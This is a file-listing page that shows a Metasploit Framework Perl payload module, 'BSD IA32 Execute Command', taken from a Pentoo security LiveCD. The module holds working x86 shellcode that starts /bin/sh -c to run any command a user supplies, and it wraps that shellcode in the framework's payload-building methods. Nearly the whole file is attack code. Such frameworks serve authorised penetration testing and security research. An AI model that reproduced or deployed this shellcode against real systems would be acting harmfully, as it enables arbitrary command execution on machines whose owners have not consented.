home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / bsd_ia32_exec.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  68 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::bsd_ia32_exec;
  11. use strict;
  12. use base 'Msf::PayloadComponent::NoConnection';
  13. use Pex::x86;
  14.  
  15. my $info =
  16. {
  17.   'Name'         => 'BSD IA32 Execute Command',
  18.   'Version'      => '$Revision: 1.1 $',
  19.   'Description'  => 'Execute an arbitrary command',
  20.   'Authors'      => [ 'vlad902 <vlad902 [at] gmail.com>', ],
  21.   'Arch'         => [ 'x86' ],
  22.   'Priv'         => 0,
  23.   'OS'           => [ 'bsd' ],
  24.   'Size'         => '',
  25.   'UserOpts'     =>
  26.    {
  27.       'CMD' => [1, 'DATA', 'The command string to execute'],
  28.    },
  29. };
  30.  
  31. sub new {
  32.   my $class = shift;
  33.   my $hash = @_ ? shift : { };
  34.   $hash = $class->MergeHashRec($hash, {'Info' => $info});
  35.   my $self = $class->SUPER::new($hash, @_);
  36.  
  37.   $self->_Info->{'Size'} = $self->_GenSize;
  38.   return($self);
  39. }
  40.  
  41. sub Build {
  42.   my $self = shift;
  43.   return($self->Generate($self->GetVar('CMD')));
  44. }
  45.  
  46. sub Generate {
  47.   my $self = shift;
  48.   my $cmd = shift;
  49.  
  50.   my $shellcode =
  51.     "\x6a\x3b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52".
  52.     "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3".
  53.     "\x52".
  54.     Pex::x86::call(length($cmd)+1).
  55.     $cmd . "\x00".
  56.     "\x57\x53\x89\xe1\x52\x51\x53\x50\xcd\x80";
  57.  
  58.   return($shellcode);
  59. }
  60.  
  61. sub _GenSize {
  62.   my $self = shift;
  63.   my $bin = $self->Generate('');
  64.   return(length($bin));
  65. }
  66.  
  67. 1;
  68.